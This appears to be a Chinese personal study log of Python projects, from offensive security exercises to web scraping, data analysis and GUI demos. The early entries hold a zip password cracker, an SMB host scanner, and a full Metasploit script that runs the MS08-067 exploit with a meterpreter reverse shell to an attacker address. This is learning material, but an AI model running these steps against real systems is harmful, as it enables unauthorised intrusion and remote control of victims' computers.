###20160510 python 灰帽编程 3
ip、port扫描器;生成ip段。
###20160510 python 灰帽编程 4
解析域名,生成用户名-口令 字典,包括根据域名生成的用户名口令。
###20160705 python绝技
####retBanner.py
socket扫描ip,port,通过返回的banner查询vulnerable.txt
####zippass.py
zFile = zipfile.ZipFile('evil.zip', 'r')
zFile.extractall(pwd='password')
使用多线程:
t = Thread(target = functionname, args = (args))
t.start
####4scanner.py
argparse解析命令行参数
参数用-h会与默认的帮助的-h冲突
命令行下运行时需要使用python name.py
--portlist --后的是变量名
nargs = '*' 可是多个变量(端口)
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet, '445')
tgtHosts = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts####2-5-conficker.py 使用python nmap发现主机(扫描)
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet, '445')
tgtHosts = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts使用python为metasploit配置.rc文件,操作metasploit:
configFile.write('use exploit/windows/smb/psexec\n')
...
configFile = open('meta.rc', 'w')####2-6-freeFloat.py 写PoC
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.37
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.77.77
set LPORT 7777
exploit –j –z为了利用Metasploit的攻击,我们选择我们的Exploit(exploit/windows/smb/ms08_067_netapi),然后设置目标为192.168.1.37。接下来我们指定攻击荷载为windows/meterpreter/reverse_tcp选择反向连接到我们的192.168.77.77的7777端口上,最后我们告诉Metasploit开始攻击系统。保存配置文件为conficker.rc,我们可以通过命令 msfconsole -r conficker.rc 来启动我们的攻击。这个命令会告诉Metasploit根据conficker.rc来启动攻击。如果成功,我们的攻击会返回一个命令行Shell来控制对方电脑。
####32recycle.py 用Python 将用户的SID 关联起来:通过检查 Windows 注册表键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList<SID>\ProfileImagePath,我们可以看到它返回 一个是%SystemDrive%\Documents and Settings<USERID>。在下图中,我 们看到这允许我们将SID 为S-1-5-21-1275210071-1715567821-725345543- 1005 转化为用户名“alex”。
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\\" + sid)
(value, type) = _winreg.QueryValueEx(key, "ProfileImagePath")
user = value.split('\\')[-1]###20161204 使用python抓取并分析数据—链家网(requests+BeautifulSoup) http://bluewhale.cc/2016-12-04/use-python-crawl-and-analysis-data-lianjia-requests-and-beautifulsoup.html scipy的安装问题【scipy-0.15.1-win32-superpack-python2.7.exe安装包】 pandas入门 http://pda.readthedocs.io/en/latest/chp5.html sklearn 是一个 Python 的 科学计算库,提供了数种聚类算法可供选择;numpy、scipy 是 Python 的科学运算库,matplotlib 是图形库,用于绘图。http://www.jianshu.com/p/93c03a09d689 ###20161220 renrendai爬虫与贷款数据分析 画图,pandas中数据的分类统计;
#按贷款目的汇总贷款笔数
title_count=rrd.groupby('title')['amount'].agg('count')###20161227 python机器学习sklearn 官方例子:\learn-python\sklearn\plot_digits_classification.py from sklearn import datasets 自带数据集 digits = datasets.load_digits() 手写数字数据 SVM分类,前一半训练,后一半预测(分类)
# Create a classifier: a support vector classifier
classifier = svm.SVC(gamma=0.001)
# We learn the digits on the first half of the digits
classifier.fit(data[:n_samples / 2], digits.target[:n_samples / 2])
# Now predict the value of the digit on the second half:
expected = digits.target[n_samples / 2:]
predicted = classifier.predict(data[n_samples / 2:])画图
#使用方法:subplot(m,n,p)subplot是将多个图画到一个平面上的工具。
# 其中,m表示是图排成m行,n表示图排成n列,也就是整个figure中有n个图是排成一行的,
# 一共m行,如果m=2就是表示2行图。p表示图所在的位置,p=1表示从左到右从上到下的第一个位置。
plt.subplot(4, 7, index + 15)###20170221 NYC_Taxi 使用Python分析纽约出租车搭乘数据 Read more: http://bluewhale.cc/#ixzz4ZIpKZQqW pd操作 ###20170222 lianjia_spider 网上的一个链家爬虫,还未测试 ###20170223 pygame 未完成 ###20170224 socket 用python实现的socket通信 python socket编程详细介绍 http://blog.csdn.net/rebelqsp/article/details/22109925 Python Socket 网络编程 http://www.cnblogs.com/hazir/p/python_socket_programming.html input()与raw_input():最好用raw_input(); 用socket.sendall();
###20170404 花瓣网图片爬虫 好!!! learn-python\qiubai_crawler、4_grab_huaban_board.py 不错的代码,print color函数;多线程; ```python #get ajax pin data 异步(下拉加载更多) url = "http://huaban.com/boards/%s/?max=%s&limit=100&wfl=1" %(board, pins[-1])
# 详细使用文档请参考: http://www.saintic.com/blog/204.html
# user(用户) 下有 board(画板),再下有pin(图片)
# http://huaban.com/boards/%s/?limit=100 在下拉加载更多的页面上直接请求100个
# url = "http://huaban.com/boards/%s/?max=%s&limit=100&wfl=1" %(board, pins[-1]) 请求到max=pins[-1]个 即最后一个。最多100个
```
###scan_ips_ports结合了正则、socket等的简单扫描器
###toutiao spider 通过保存toutiao的图片学用mongodb
###CmdPipe 输出重定向、logging模块
###20170510 调用shodan
###20170510 Scanless 使用以下几个网站进行扫描:
| Scanner Name | Website |
|---|---|
| yougetsignal | http://www.yougetsignal.com |
| viewdns | http://viewdns.info |
| hackertarget | https://hackertarget.com |
| ipfingerprints | http://www.ipfingerprints.com |
| pingeu | http://ping.eu |
| spiderip | https://spiderip.com |
| portcheckers | http://www.portcheckers.com |
###20170515 smart_login [转] 本项目用于研究和分享各大网站的模拟登陆方式,主要使用selenium+phantomjs或者直接登录的方式,语言采用Python 可以在登录过后得到的cookie维护起来,然后调用requests或者scrapy等进行数据采集,这样数据采集的速度可以得到保证。
###20170519 data_analyse\tableau 蓝鲸的网站分析笔记 使用python和tableau对数据进行抓取及可视化 http://bluewhale.cc/2017-05-05/use-python-and-tableau-to-capture-and-visualize-the-data.html
from PIL import Image # sudo pip install pillow20170808 70个Python练手项目列表 实验楼 2 实现2048游戏 https://www.shiyanlou.com/courses/368/labs/1172/document
有限状态机,矩阵转置、列表遍历等基本数据操作
分析了最新的返回数据格式。
调用高德API index.html代码可能过时,功能未实现。待研习其代码。
Pillow 模块 向量空间图像识别:你有 3 篇文档,我们要怎么计算它们之间的相似度呢?2 篇文档所使用的相同的单词越多,那这两篇文章就越相似!但是这单词太多怎么办,就由我们来选择几个关键单词,选择的单词又被称作特征,每一个特征就好比空间中的一个维度(x,y,z 等),一组特征就是一个矢量,每一个文档我们都能得到这么一个矢量,只要计算矢量之间的夹角就能得到文章的相似度了。
Gephi是一款开源免费跨平台基于JVM的复杂网络分析复杂网络分析软件,,其主要用于各种网络和复杂系统,动态和分层图的交互可视化与探测开源工具。 py程序生成了节点数据和节点间边的数据(带weight),导入Gephi后可进行可视化。有节点大小、颜色、边的粗细,以及动态效果。
# 设置窗口标题
self.setWindowTitle('My First App')
# 设置标签
label = QLabel('Welcome to Shiyanlou!')
# 创建应用实例,通过 sys.argv 传入命令行参数
app = QApplication(sys.argv)
# 创建窗口实例
window = MainWindow()
# 显示窗口
window.show()
# 执行应用,进入事件循环
app.exec_()